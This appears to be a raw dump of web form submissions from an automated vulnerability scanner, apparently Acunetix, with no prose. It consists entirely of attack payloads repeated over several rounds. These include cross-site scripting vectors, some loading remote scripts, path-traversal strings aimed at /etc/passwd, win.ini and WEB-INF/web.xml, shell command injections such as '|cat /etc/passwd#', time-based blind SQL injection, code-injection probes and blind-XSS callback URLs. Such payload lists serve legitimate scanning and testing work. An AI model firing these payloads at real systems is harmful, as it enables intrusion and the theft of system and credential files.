acux5739\xc0\xbez1\xc0\xbcz2a\x90bcxuca5739

1

1<ScRiPt >prompt(963130)</ScRiPt>

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(955432)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(930817)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?948316></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(912507)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(937905)">

1

WEB-INF/web.xml

1

1

response.write(9462429*9669948)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(999419)"></g></svg>

WEB-INF\web.xml

'+response.write(9462429*9669948)+'

1

1<div style=width:expression(prompt(985890))>

1

1

"+response.write(9462429*9669948)+"

1

1

&cat /etc/passwd&

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(976360)>

1

1

'&cat /etc/passwd&'

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(920881)>

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img src=xyz OnErRor=prompt(929439)>

${99860+100181}

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img/src=">" onerror=alert(978413)>

1

`cat /etc/passwd`

1

1

-1

1<ScRiPt%20>prompt(954847)</sCripT>

1

1&n951442=v915515

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

1

1&lt

-1)

|cat /etc/passwd#

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

'|'ld

-1))

\xf6<img acu onmouseover=prompt(942986) //\xf6>

^(#$!@#$)(()))******

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

1<input autofocus onfocus=prompt(942570)>

iCLKCFY1'

"|"ld

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

"

1

5wS7Lx0n')

<a href='http://www.acunetix.com'>website security</a>

1

1

1

/etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

8JWLSzpJ'))

'

${@print(md5(acunetix_wvs_security_test))}

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

acunetix_wvs_invalid_filename

1

http://hittjHGw4a4DG.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

"

-1

1

1_TbalP <ScRiPt >prompt(956250)</ScRiPt>

1

comments

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

||cat /etc/passwd

-1)

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

comments

1

&dir

-1))

1

1

http://www.acunetix.tst

'"

1

comments/.

1

'&dir&'

QPzsWAgw'

1

1

file:///etc/passwd

<!--

1

1

1

1'"()&%<ScRiPt >prompt(943250)</ScRiPt>

R92t2TJP')

1

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

rF8rsuy6'))

'"()&%<ScRiPt >prompt(999077)</ScRiPt>

1

1

WEB-INF/web.xml

1

1

|dir

1_984514

1

1

WEB-INF\web.xml

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu8429\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8429

1

1

acux6152\xc0\xbez1\xc0\xbcz2a\x90bcxuca6152

1

1<ScRiPt >prompt(912950)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(971708)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(921815)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?931699></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(947521)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(977136)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977355)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<div style=width:expression(prompt(953688))>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

1

1<body onload=prompt(963171)>

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(927236)>

1

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(968992)>

1

1

1<img/src=">" onerror=alert(912564)>

1

1<ScRiPt%20>prompt(908352)</sCripT>

1

1

1&lt

\xf6<img acu onmouseover=prompt(939162) //\xf6>

1

1

1<input autofocus onfocus=prompt(939805)>

1

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_6e7UR <ScRiPt >prompt(918749)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9973508*9051337)

1

1

'+response.write(9973508*9051337)+'

1

"+response.write(9973508*9051337)+"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1

"&cat /etc/passwd&"

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

1

-1)

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${100217+99204}

1

1

-1))

1

`cat /etc/passwd`

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

4VKdWxIG'

1&n933494=v957789

1some_inexistent_file_with_long_name%00.jpg

)

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'|'ld

!(()&&!|*|*|

zP7mFFSe')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

/etc/passwd

^(#$!@#$)(()))******

QeJOUd40'))

testasp.vulnweb.com

'

'"()

1

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

"

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

DgHNrmRj'

http://hitnk87kLuEZ7.bxss.me/

1

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

iCyA0Tax')

&dir

1

comments

1

1

JoxfWaLa'))

1

file:///etc/passwd

http://www.acunetix.tst

comments

1

'&dir&'

'"

1'"()&%<ScRiPt >prompt(998361)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

"&dir&"

1

1

<!--

'"()&%<ScRiPt >prompt(911986)</ScRiPt>

1

WEB-INF/web.xml

1_978977

|dir

1

1

1

WEB-INF\web.xml

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

"|dir

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu9497\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9497

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

acux7930\xc0\xbez1\xc0\xbcz2a\x90bcxuca7930

1

1<ScRiPt >prompt(975461)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(953030)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(964272)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?989747></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(950511)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(955070)">

1

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(907773)"></g></svg>

response.write(9037152*9802396)

1

1

WEB-INF\web.xml

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

'+response.write(9037152*9802396)+'

1<div style=width:expression(prompt(991160))>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9037152*9802396)+"

1

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(978605)>

1

cat /etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961532)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

`cat /etc/passwd`

1

1<img src=xyz OnErRor=prompt(986652)>

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

${100418+99350}

1<img/src=">" onerror=alert(927164)>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(991590)</sCripT>

1&n930496=v995384

)

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

"|"ld

1

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

kKWvdq3o'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(914152) //\xf6>

YaodOXeJ')

^(#$!@#$)(()))******

'"()

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<input autofocus onfocus=prompt(906659)>

/etc/passwd

'

'

1

1

1

9oyYwBHf'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

"

<a href='http://www.acunetix.com'>website security</a>

1

-1

1

1

1

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

http://hiti91NFVDhS3.bxss.me/

-1)

1

${@print(md5(acunetix_wvs_security_test))}\

&dir

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1_KQW9Q <ScRiPt >prompt(950184)</ScRiPt>

1

1

-1))

1

comments

1

1

'&dir&'

1

1

1

comments

yNoiFZe2'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

1

1

"&dir&"

file:///etc/passwd

'"

1

1

1

iURnxL4w')

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

1

1

|dir

Rh0tJvvf'))

1

1

1'"()&%<ScRiPt >prompt(916653)</ScRiPt>

WEB-INF/web.xml

<!--

'|dir

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(926914)</ScRiPt>

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1_948999

1

1

../../../../../../../../../../boot.ini

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

acu3031\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3031

1

..\..\..\..\..\..\..\..\windows\win.ini

1

acux8222\xc0\xbez1\xc0\xbcz2a\x90bcxuca8222

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(985399)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<script>prompt(985921)</script>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(935377)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?980075></ScRiPt>

1

1

WEB-INF/web.xml

1

1

response.write(9132551*9258505)

1

1<ScRiPt >prompt(965001)</ScRiPt>

1

WEB-INF\web.xml

1

1

&cat /etc/passwd&

'+response.write(9132551*9258505)+'

1<video><source onerror="javascript:prompt(973682)">

1

1

1

"+response.write(9132551*9258505)+"

'&cat /etc/passwd&'

1

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(962741)"></g></svg>

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<div style=width:expression(prompt(913416))>

1

1

1

1

1

cat /etc/passwd

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${99746+99542}

1<body onload=prompt(909609)>

`cat /etc/passwd`

1

1

1&n947709=v967196

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973178)>

1

1some_inexistent_file_with_long_name%00.jpg

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

)

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1<img src=xyz OnErRor=prompt(963674)>

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

"|"ld

1<img/src=">" onerror=alert(989431)>

testasp.vulnweb.com

1

7GG6LwvV'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1<ScRiPt%20>prompt(958447)</sCripT>

1

/etc/passwd

1

1

flEQWQH0')

1&lt

'

1

"

1

6viWW5KV'))

1

1

1

\xf6<img acu onmouseover=prompt(984085) //\xf6>

1

${@print(md5(acunetix_wvs_security_test))}

"

1

1<input autofocus onfocus=prompt(920569)>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitkVjJNITjie.bxss.me/

-1

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

<a href='http://www.acunetix.com'>website security</a>

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

comments

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1))

[url=http://www.acunetix.com]website security[/url]

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

http://www.acunetix.tst

'&dir&'

9MwU80MA'

1

'"

1

"&dir&"

1

comments/.

1_HAT2N <ScRiPt >prompt(932786)</ScRiPt>

1'"()&%<ScRiPt >prompt(912710)</ScRiPt>

1

<!--

1

vPzxMWHp')

'"()&%<ScRiPt >prompt(972364)</ScRiPt>

1

|dir

1

file:///etc/passwd

1

vgo7IGHE'))

1

1

1_966898

'|dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

"|dir

1

WEB-INF/web.xml

acu6145\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6145

1

1

1

acux1605\xc0\xbez1\xc0\xbcz2a\x90bcxuca1605

WEB-INF\web.xml

1

1

1

1

1<ScRiPt >prompt(921340)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

1

1<script>prompt(958355)</script>

../../../../../../../../../../boot.ini

1

1

1

1<ScRiPt >prompt(954216)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?968684></ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(982061)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(997214)">

1

................windowswin.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(975058)"></g></svg>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<div style=width:expression(prompt(968179))>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(930894)>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

response.write(9366851*9752030)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981339)>

../../../../../../../../../../etc/passwd

&cat /etc/passwd&

'+response.write(9366851*9752030)+'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=xyz OnErRor=prompt(911868)>

"+response.write(9366851*9752030)+"

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

WEB-INF/web.xml

1

1<img/src=">" onerror=alert(959280)>

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF\web.xml

1

${99210+100237}

1<ScRiPt%20>prompt(964816)</sCripT>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1&lt

1

-1

`cat /etc/passwd`

1&n998535=v981683

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

1

\xf6<img acu onmouseover=prompt(958940) //\xf6>

)

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1

1

1

'|'ld

!(()&&!|*|*|

1<input autofocus onfocus=prompt(976306)>

-1))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

iZOu0O3k'

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

"|"ld

testasp.vulnweb.com

/etc/passwd

'"()

1

MEQtjsyU')

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

1

1

1

1

1

"

ZQXn6AeI'))

1

1

1

'

1_NUeye <ScRiPt >prompt(941844)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

"

http://hitDdaq51FIaU.bxss.me/

1

1

-1)

acunetix_wvs_invalid_filename

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

1

||cat /etc/passwd

1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

NoApyGpb'

1

1

comments

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

'"

2h4YTQ2F')

1

1

'&dir&'

<!--

comments/.

1'"()&%<ScRiPt >prompt(916715)</ScRiPt>

1

lwrcvhL3'))

1

1

file:///etc/passwd

'"()&%<ScRiPt >prompt(907808)</ScRiPt>

1

1

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

1

1

|dir

1

1_954988

1

1

1

WEB-INF/web.xml

1

'|dir

1

1

WEB-INF\web.xml

"|dir

1

1

1

acu2047\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2047

1

../../../../../../../../../../windows/win.ini

1

acux10467\xc0\xbez1\xc0\xbcz2a\x90bcxuca10467

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(984326)</ScRiPt>

1

1

1

1

1<script>prompt(988039)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(997978)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?962804></ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(963006)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(978909)">

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(969708)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<div style=width:expression(prompt(948642))>

1

1

response.write(9621786*9088110)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<iframe src='data:text/html

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9621786*9088110)+'

1<body onload=prompt(967543)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9621786*9088110)+"

'&cat /etc/passwd&'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985185)>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

WEB-INF/web.xml

1

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(992618)>

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

1<img/src=">" onerror=alert(953848)>

1

1

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(991297)</sCripT>

1

${99308+99038}

-1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

1&n973459=v908704

1&lt

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

1

1

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

\xf6<img acu onmouseover=prompt(915696) //\xf6>

1

)

'|'ld

1

14Qr5s7e'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

!(()&&!|*|*|

testasp.vulnweb.com

1<input autofocus onfocus=prompt(921345)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

xolPsvfD')

1

'"()

<a href='http://www.acunetix.com'>website security</a>

1

^(#$!@#$)(()))******

'

1

1

/etc/passwd

QRigzDeC'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

'

1

1

[url=http://www.acunetix.com]website security[/url]

-1

1

1

1

1

1_Ba8F7 <ScRiPt >prompt(938939)</ScRiPt>

1

"

${@print(md5(acunetix_wvs_security_test))}

1

http://hitlEdXdLxrqt.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

acunetix_wvs_invalid_filename

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

&dir

1

TU5vihJl'

1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

'&dir&'

comments

'"

1

CUA2lfmL')

http://www.acunetix.tst

1

1'"()&%<ScRiPt >prompt(900258)</ScRiPt>

"&dir&"

1

JhzSa1lV'))

<!--

comments/.

1

|dir

'"()&%<ScRiPt >prompt(951147)</ScRiPt>

file:///etc/passwd

1

1

1

1

1

1_956987

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

WEB-INF/web.xml

1

1

1

"|dir

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

acu2522\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2522

1

1

1

../../../../../../../../../../windows/win.ini.jpg

